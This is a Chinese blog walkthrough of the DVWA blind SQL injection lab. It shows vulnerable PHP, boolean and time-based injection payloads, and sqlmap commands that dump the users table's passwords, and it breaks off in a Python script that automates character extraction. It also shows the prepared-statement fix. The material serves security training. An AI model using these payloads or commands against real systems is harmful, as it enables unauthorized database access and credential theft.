<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 8.1.0">
<link rel="preconnect" href="https://cdnjs.cloudflare.com" crossorigin>
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.css" integrity="sha256-gkQVf8UKZgQ0HyuxL/VnacadJ+D2Kox2TCEBuNQg5+w=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/blue/pace-theme-minimal.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous" defer></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Gemini","darkmode":true,"version":"8.25.0","exturl":true,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":"mac"},"fold":{"enable":true,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":true,"pangu":true,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="漏洞简介盲注，顾名思义就是”盲着注”。和普通注入不同，盲注拿不到数据库的回显，只能靠猜——通过页面不同的反应来判断猜得对不对。虽然麻烦，但能拿到数据就是好注入。 这关主要学布尔盲注和时间盲注。 盲注类型   类型 说明    布尔盲注 看页面返回判断条件真假   时间盲注 看响应时间判断条件真假   报错盲注 从报错信息里提取数据   常用函数先记几个盲注常用的函数：    函数 说明    le">
<meta property="og:type" content="article">
<meta property="og:title" content="DVWA SQL Injection Blind SQL盲注通关教程">
<meta property="og:url" content="http://example.com/2021/02/14/DVWA-SQL-Injection-Blind-SQL%E7%9B%B2%E6%B3%A8%E9%80%9A%E5%85%B3%E6%95%99%E7%A8%8B/index.html">
<meta property="og:site_name" content="l1n6yun&#39;s Blog">
<meta property="og:description" content="漏洞简介盲注，顾名思义就是”盲着注”。和普通注入不同，盲注拿不到数据库的回显，只能靠猜——通过页面不同的反应来判断猜得对不对。虽然麻烦，但能拿到数据就是好注入。 这关主要学布尔盲注和时间盲注。 盲注类型   类型 说明    布尔盲注 看页面返回判断条件真假   时间盲注 看响应时间判断条件真假   报错盲注 从报错信息里提取数据   常用函数先记几个盲注常用的函数：    函数 说明    le">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/pasted-110.png">
<meta property="og:image" content="http://example.com/images/pasted-111.png">
<meta property="og:image" content="http://example.com/images/pasted-112.png">
<meta property="og:image" content="http://example.com/images/pasted-113.png">
<meta property="article:published_time" content="2021-02-14T02:00:00.000Z">
<meta property="article:modified_time" content="2026-03-30T08:09:57.377Z">
<meta property="article:author" content="l1n6yun">
<meta property="article:tag" content="DVWA">
<meta property="article:tag" content="SQL注入">
<meta property="article:tag" content="Web安全">
<meta property="article:tag" content="盲注">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/pasted-110.png">


<link rel="canonical" href="http://example.com/2021/02/14/DVWA-SQL-Injection-Blind-SQL%E7%9B%B2%E6%B3%A8%E9%80%9A%E5%85%B3%E6%95%99%E7%A8%8B/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2021/02/14/DVWA-SQL-Injection-Blind-SQL%E7%9B%B2%E6%B3%A8%E9%80%9A%E5%85%B3%E6%95%99%E7%A8%8B/","path":"2021/02/14/DVWA-SQL-Injection-Blind-SQL盲注通关教程/","title":"DVWA SQL Injection Blind SQL盲注通关教程"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>DVWA SQL Injection Blind SQL盲注通关教程 | l1n6yun's Blog</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/next-theme-pjax/0.6.0/pjax.min.js" integrity="sha256-vxLn1tSKWD4dqbMRyv940UYw4sXgMtYcK6reefzZrao=" crossorigin="anonymous" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.umd.js" integrity="sha256-a+H7FYzJv6oU2hfsfDGM2Ohw/cR9v+hPfxHCLdmCrE8=" crossorigin="anonymous" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/lozad.js/1.16.0/lozad.min.js" integrity="sha256-mOFREFhqmHeQbXpK2lp4nA3qooVgACfh88fpJftLBbc=" crossorigin="anonymous" defer></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pangu/7.2.0/pangu.umd.js" integrity="sha256-JnmRRnJK7DC6RQJbAJb6AXOM9OmWzS6z8eYultk/48Y=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script><script src="/js/pjax.js" defer></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.5.0/search.js" integrity="sha256-xFC6PJ82SL9b3WkGjFavNiA9gm5z6UBxWPiu4CYjptg=" crossorigin="anonymous" defer></script>
<script src="/js/third-party/search/local-search.js" defer></script>




  <script src="/js/third-party/fancybox.js" defer></script>

  <script src="/js/third-party/pace.js" defer></script>


  




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><script class="next-config" data-name="mathjax" type="application/json">{"enable":true,"tags":"none","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mathjax/3.2.2/es5/tex-mml-chtml.js","integrity":"sha256-MASABpB4tYktI2Oitl4t+78w/lyA+D7b/s9GEP0JOGI="}}</script>
<script src="/js/third-party/math/mathjax.js" defer></script>



  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">l1n6yun's Blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">记录学习的技能和遇到的问题</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">361</span></a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">140</span></a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E7%AE%80%E4%BB%8B"><span class="nav-number">1.</span> <span class="nav-text">漏洞简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9B%B2%E6%B3%A8%E7%B1%BB%E5%9E%8B"><span class="nav-number">2.</span> <span class="nav-text">盲注类型</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0"><span class="nav-number">3.</span> <span class="nav-text">常用函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Low-%E7%BA%A7%E5%88%AB"><span class="nav-number">4.</span> <span class="nav-text">Low 级别</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%89%8B%E5%8A%A8%E7%9B%B2%E6%B3%A8"><span class="nav-number">4.1.</span> <span class="nav-text">手动盲注</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%94%A8-SQLMap"><span class="nav-number">4.2.</span> <span class="nav-text">用 SQLMap</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Medium-%E7%BA%A7%E5%88%AB"><span class="nav-number">5.</span> <span class="nav-text">Medium 级别</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95"><span class="nav-number">5.1.</span> <span class="nav-text">攻击方法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#High-%E7%BA%A7%E5%88%AB"><span class="nav-number">6.</span> <span class="nav-text">High 级别</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="nav-number">6.1.</span> <span class="nav-text">时间盲注</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Impossible-%E7%BA%A7%E5%88%AB"><span class="nav-number">7.</span> <span class="nav-text">Impossible 级别</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%87%AA%E5%8A%A8%E5%8C%96%E7%9B%B2%E6%B3%A8%E8%84%9A%E6%9C%AC"><span class="nav-number">8.</span> <span class="nav-text">自动化盲注脚本</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93"><span class="nav-number">9.</span> <span class="nav-text">小结</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="l1n6yun"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">l1n6yun</p>
  <div class="site-description" itemprop="description">chitanda | 互联网 | 前端 | 宅 | 动漫 | 京阿尼</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">140</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">361</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2wxbjZ5dW4=" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;l1n6yun"><i class="fab fa-github fa-fw"></i>GitHub</span>
      </span>
      <span class="links-of-author-item">
        <span class="exturl" data-url="bWFpbHRvOmwxbjZ5dW5AZ21haWwuY29t" title="E-Mail → mailto:l1n6yun@gmail.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</span>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/02/14/DVWA-SQL-Injection-Blind-SQL%E7%9B%B2%E6%B3%A8%E9%80%9A%E5%85%B3%E6%95%99%E7%A8%8B/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="l1n6yun">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="l1n6yun's Blog">
      <meta itemprop="description" content="chitanda | 互联网 | 前端 | 宅 | 动漫 | 京阿尼">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="DVWA SQL Injection Blind SQL盲注通关教程 | l1n6yun's Blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          DVWA SQL Injection Blind SQL盲注通关教程
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2021-02-14 10:00:00" itemprop="dateCreated datePublished" datetime="2021-02-14T10:00:00+08:00">2021-02-14</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">安全</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="漏洞简介"><a href="#漏洞简介" class="headerlink" title="漏洞简介"></a>漏洞简介</h2><p>盲注，顾名思义就是”盲着注”。和普通注入不同，盲注拿不到数据库的回显，只能靠猜——通过页面不同的反应来判断猜得对不对。虽然麻烦，但能拿到数据就是好注入。</p>
<p>这关主要学布尔盲注和时间盲注。</p>
<h2 id="盲注类型"><a href="#盲注类型" class="headerlink" title="盲注类型"></a>盲注类型</h2><table>
<thead>
<tr>
<th>类型</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>布尔盲注</td>
<td>看页面返回判断条件真假</td>
</tr>
<tr>
<td>时间盲注</td>
<td>看响应时间判断条件真假</td>
</tr>
<tr>
<td>报错盲注</td>
<td>从报错信息里提取数据</td>
</tr>
</tbody></table>
<h2 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h2><p>先记几个盲注常用的函数：</p>
<table>
<thead>
<tr>
<th>函数</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td><code>length(str)</code></td>
<td>字符串长度</td>
</tr>
<tr>
<td><code>substr(str,start,length)</code></td>
<td>截取字符串</td>
</tr>
<tr>
<td><code>ascii(str)</code></td>
<td>字符转 ASCII 码</td>
</tr>
<tr>
<td><code>if(condition,a,b)</code></td>
<td>条件判断</td>
</tr>
<tr>
<td><code>sleep(n)</code></td>
<td>延迟 n 秒</td>
</tr>
</tbody></table>
<h2 id="Low-级别"><a href="#Low-级别" class="headerlink" title="Low 级别"></a>Low 级别</h2><p>看代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$id</span> = <span class="variable">$_GET</span>[ <span class="string">&#x27;id&#x27;</span> ];</span><br><span class="line"><span class="variable">$query</span>  = <span class="string">&quot;SELECT first_name, last_name FROM users WHERE user_id = &#x27;<span class="subst">$id</span>&#x27;;&quot;</span>;</span><br><span class="line"><span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$GLOBALS</span>[<span class="string">&quot;___mysqli_ston&quot;</span>],  <span class="variable">$query</span> );</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="title function_ invoke__">mysqli_num_rows</span>( <span class="variable">$result</span> ) &gt; <span class="number">0</span> ) &#123;</span><br><span class="line">    <span class="comment">// 用户存在</span></span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="comment">// 用户不存在</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>有注入点，但只告诉你”存在”或”不存在”，典型的布尔盲注场景。</p>
<h3 id="手动盲注"><a href="#手动盲注" class="headerlink" title="手动盲注"></a>手动盲注</h3><p><strong>第一步：确认注入</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; and 1=1#    -&gt; 用户存在</span><br><span class="line">1&#x27; and 1=2#    -&gt; 用户不存在</span><br></pre></td></tr></table></figure>

<p>确认有盲注。</p>
<p><strong>第二步：猜数据库名长度</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; and length(database())=1#   不存在</span><br><span class="line">1&#x27; and length(database())=2#   不存在</span><br><span class="line">...</span><br><span class="line">1&#x27; and length(database())=4#   存在</span><br></pre></td></tr></table></figure>

<p>数据库名 4 个字符。</p>
<p><strong>第三步：逐字符猜</strong></p>
<p>用二分法猜第一个字符的 ASCII 码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; and ascii(substr(database(),1,1))&gt;97#    存在</span><br><span class="line">1&#x27; and ascii(substr(database(),1,1))&gt;100#   存在</span><br><span class="line">1&#x27; and ascii(substr(database(),1,1))&gt;120#   不存在</span><br><span class="line">1&#x27; and ascii(substr(database(),1,1))=100#   存在</span><br></pre></td></tr></table></figure>

<p>ASCII 码 100，就是字母 <code>d</code>。</p>
<p>继续猜后面几个：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; and ascii(substr(database(),2,1))=118#   -&gt; v</span><br><span class="line">1&#x27; and ascii(substr(database(),3,1))=119#   -&gt; w</span><br><span class="line">1&#x27; and ascii(substr(database(),4,1))=97#    -&gt; a</span><br></pre></td></tr></table></figure>

<p>数据库名是 <code>dvwa</code>。</p>
<p>手动盲注是真累，猜一个名字就要发几十个请求。实际渗透还是用工具吧。</p>
<h3 id="用-SQLMap"><a href="#用-SQLMap" class="headerlink" title="用 SQLMap"></a>用 SQLMap</h3><p>SQLMap 一条命令搞定：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">&quot;http://localhost:3892/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit&quot;</span> --cookie=<span class="string">&quot;PHPSESSID=m0rsgl5arvatrm36nuq4ngdim6;security=low&quot;</span> --dbs</span><br></pre></td></tr></table></figure>

<p><img data-src="/images/pasted-110.png" alt="upload successful"></p>
<p>查表：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">&quot;http://localhost:3892/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit&quot;</span> --cookie=<span class="string">&quot;PHPSESSID=m0rsgl5arvatrm36nuq4ngdim6;security=low&quot;</span> -D dvwa --tables</span><br></pre></td></tr></table></figure>

<p><img data-src="/images/pasted-111.png" alt="upload successful"></p>
<p>查字段：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">&quot;http://localhost:3892/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit&quot;</span> --cookie=<span class="string">&quot;PHPSESSID=m0rsgl5arvatrm36nuq4ngdim6;security=low&quot;</span> -D dvwa -T <span class="built_in">users</span> --columns</span><br></pre></td></tr></table></figure>

<p><img data-src="/images/pasted-112.png" alt="upload successful"></p>
<p>拖数据：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">&quot;http://localhost:3892/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit&quot;</span> --cookie=<span class="string">&quot;PHPSESSID=m0rsgl5arvatrm36nuq4ngdim6;security=low&quot;</span> -D dvwa -T <span class="built_in">users</span> -C user,password --dump</span><br></pre></td></tr></table></figure>

<p><img data-src="/images/pasted-113.png" alt="upload successful"></p>
<p>这就是工具的力量。</p>
<h2 id="Medium-级别"><a href="#Medium-级别" class="headerlink" title="Medium 级别"></a>Medium 级别</h2><p>Medium 级别用了 POST 提交加转义：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$id</span> = <span class="variable">$_POST</span>[ <span class="string">&#x27;id&#x27;</span> ];</span><br><span class="line"><span class="variable">$id</span> = <span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$GLOBALS</span>[<span class="string">&quot;___mysqli_ston&quot;</span>], <span class="variable">$id</span>);</span><br><span class="line"><span class="variable">$query</span>  = <span class="string">&quot;SELECT first_name, last_name FROM users WHERE user_id = <span class="subst">$id</span>;&quot;</span>;</span><br></pre></td></tr></table></figure>

<p>注意 <code>$id</code> 没引号，是数字型注入，单引号转义没用。</p>
<h3 id="攻击方法"><a href="#攻击方法" class="headerlink" title="攻击方法"></a>攻击方法</h3><p>用 Burp 抓包改请求，或者直接用 SQLMap：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">&quot;http://localhost:3892/vulnerabilities/sqli_blind/&quot;</span> --data=<span class="string">&quot;id=1&amp;Submit=Submit&quot;</span> --cookie=<span class="string">&quot;PHPSESSID=m0rsgl5arvatrm36nuq4ngdim6;security=medium&quot;</span> --dbs</span><br></pre></td></tr></table></figure>

<h2 id="High-级别"><a href="#High-级别" class="headerlink" title="High 级别"></a>High 级别</h2><p>High 级别从 session 取参数，还加了 <code>LIMIT 1</code>：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$id</span> = <span class="variable">$_SESSION</span>[ <span class="string">&#x27;id&#x27;</span> ];</span><br><span class="line"><span class="variable">$query</span>  = <span class="string">&quot;SELECT first_name, last_name FROM users WHERE user_id = &#x27;<span class="subst">$id</span>&#x27; LIMIT 1;&quot;</span>;</span><br></pre></td></tr></table></figure>

<p>布尔盲注可能被 <code>LIMIT 1</code> 干扰，换时间盲注。</p>
<h3 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h3><p><strong>测试：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; and sleep(5)#</span><br></pre></td></tr></table></figure>

<p>如果响应卡了 5 秒，就说明有注入。</p>
<p><strong>猜数据库名长度：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; and if(length(database())=4,sleep(3),0)#</span><br></pre></td></tr></table></figure>

<p>延迟 3 秒，长度是 4。</p>
<p><strong>逐字符猜：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; and if(ascii(substr(database(),1,1))=100,sleep(3),0)#</span><br></pre></td></tr></table></figure>

<p>延迟 3 秒，第一个字符是 <code>d</code>。</p>
<p><strong>用 SQLMap：</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap -u <span class="string">&quot;http://localhost:3892/vulnerabilities/sqli_blind/&quot;</span> --cookie=<span class="string">&quot;PHPSESSID=m0rsgl5arvatrm36nuq4ngdim6;security=high&quot;</span> --level=3 --risk=2 --dbs</span><br></pre></td></tr></table></figure>

<h2 id="Impossible-级别"><a href="#Impossible-级别" class="headerlink" title="Impossible 级别"></a>Impossible 级别</h2><p>Impossible 级别用 PDO 预处理：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$id</span> = <span class="variable">$_GET</span>[ <span class="string">&#x27;id&#x27;</span> ];</span><br><span class="line"><span class="keyword">if</span>( <span class="title function_ invoke__">is_numeric</span>( <span class="variable">$id</span> ) ) &#123;</span><br><span class="line">    <span class="variable">$data</span> = <span class="variable">$db</span>-&gt;<span class="title function_ invoke__">prepare</span>( <span class="string">&#x27;SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;&#x27;</span> );</span><br><span class="line">    <span class="variable">$data</span>-&gt;<span class="title function_ invoke__">bindParam</span>( <span class="string">&#x27;:id&#x27;</span>, <span class="variable">$id</span>, PDO::<span class="variable constant_">PARAM_INT</span> );</span><br><span class="line">    <span class="variable">$data</span>-&gt;<span class="title function_ invoke__">execute</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>预处理 + 类型验证，注入不了。</p>
<h2 id="自动化盲注脚本"><a href="#自动化盲注脚本" class="headerlink" title="自动化盲注脚本"></a>自动化盲注脚本</h2><p>写个 Python 脚本省得手工猜：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://localhost:3892/vulnerabilities/sqli_blind/&quot;</span></span><br><span class="line">cookies = &#123;<span class="string">&quot;PHPSESSID&quot;</span>: <span class="string">&quot;m0rsgl5arvatrm36nuq4ngdim6&quot;</span>, <span class="string">&quot;security&quot;</span>: <span class="string">&quot;low&quot;</span>&#125;</span><br><span class="line"></span><br><span class="line">result = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">50</span>):</span><br><span class="line">    low = <span class="number">32</span></span><br><span class="line">    high = <span class="number">127</span></span><br><span class="line">    <span class="keyword">while</span> low &lt; high:</span><br><span class="line">        mid = (low + high) // <span class="number">2</span></span><br><span class="line">        payload = <span class="string">f&quot;1&#x27; and ascii(substr(database(),<span class="subst">&#123;i&#125;</span>,1))&gt;<span 